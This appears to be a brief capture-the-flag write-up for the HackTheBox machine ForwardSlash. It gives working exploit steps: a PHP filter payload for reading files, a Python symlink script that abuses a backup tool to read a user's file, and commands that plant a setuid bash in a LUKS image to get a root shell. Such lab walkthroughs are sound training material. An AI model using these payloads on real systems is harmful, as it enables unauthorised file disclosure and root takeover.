ForwardSlash @ HackTheBox
ForwardSlash is a 40-point Linux Machine on HackTheBox. We use a path traversal vulnerability to get ssh credentials and abuse a custom backup program to read an old configuration file. For root we mount a custom LUKS image that contains a setuid program.
Notes
PHP Filter
1
php://filter/convert.base64-encode/resource=dev/index.php
Backup Tool
1
2
3
4
5
6
7
8
import hashlib
import os
import time
m = hashlib.md5()
m.update(str(time.strftime("%H:%M:%S")))
os.system('ln -s /home/pain/user.txt '+m.hexdigest())
os.system('/usr/bin/backup')
Luks Local
1
2
3
4
5
6
7
8
9
dd if=/dev/zero of=/tmp/vol bs=1M count=64
sudo cryptsetup -vy luksFormat /tmp/vol
sudo cryptsetup luksOpen /tmp/vol vol
sudo mkfs.ext4 /dev/mapper/vol
sudo mount /dev/mapper/vol /mnt
scp pain@forwardslash.htb:/bin/bash .
cp bash /mnt/bash; chmod u+s /mnt/bash
sudo umount /mnt && sudo cryptsetup luksClose vol
scp /tmp/vol pain@forwardslash.htb:/tmp/vol
LUKS Remote
1
2
3
4
5
sudo cryptsetup luksOpen /tmp/vol backup
cd
mkdir mnt
sudo /bin/mount /dev/mapper/backup ./mnt/
cd mnt; ./bash -p
This post is licensed under CC BY 4.0 by the author.